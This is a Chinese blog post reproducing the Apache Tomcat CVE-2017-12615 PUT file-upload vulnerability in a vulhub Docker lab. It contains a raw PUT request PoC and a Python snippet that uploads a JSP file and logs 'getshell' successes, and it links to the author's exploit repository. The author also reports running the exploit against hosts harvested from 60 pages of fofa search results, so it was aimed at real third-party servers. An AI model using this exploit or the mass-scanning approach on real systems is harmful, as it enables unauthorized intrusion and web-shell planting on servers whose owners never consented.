CVE-2017-12615复现

  1. 前言
  2. 漏洞介绍

前言

好久没复现过vulhub里的漏洞了,昨天晚上复现了一个。现在记录一下
复现的是CVE+2017-12615
timg?image&quality=80&size=b9999_10000&sec=1565854600085&di=5b63faebe1996522c2caa0354ef8fc2c&imgtype=0&src=http%3A%2F%2Fb-ssl.duitang.com%2Fuploads%2Fitem%2F201505%2F15%2F20150515230612_PxwH2.thumb.700_0.jpeg

漏洞介绍

利用条件:

Apache Tomcat允许PUT上传
允许写入文件

Vulhub - Docker-Compose file for vulnerability environment

进入对应的文件夹执行

docker-compose build
docker-compose up -d

mA7etU.png

访问如下
mA7thD.png

开burp刷新发送POC

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

返回状态码为201即为上传成功
mA7Wcj.png

构造exp

rqt=requests.put(url=url+'{}'.format(self.path),data=self.data,headers=self.headers,timeout=3)
if rqt.status_code==201:
    print('[+] getshell成功:{}'.format(rqt.url))
    print('[+] getshell成功:{}'.format(rqt.url),file=open('save.txt','a'))

代码地址:https://github.com/422926799/python/tree/master/CVE-2017-12615

效果不咋滴,估计都修复了。从fofa爬了60页没一个成的
mAHAvd.png

mAHnVP.png


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:CVE-2017-12615复现

本文作者:九世

发布时间:2019-08-15, 10:08:24

最后更新:2019-08-15, 13:08:21

原始链接:http://422926799.github.io/posts/310ec487.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录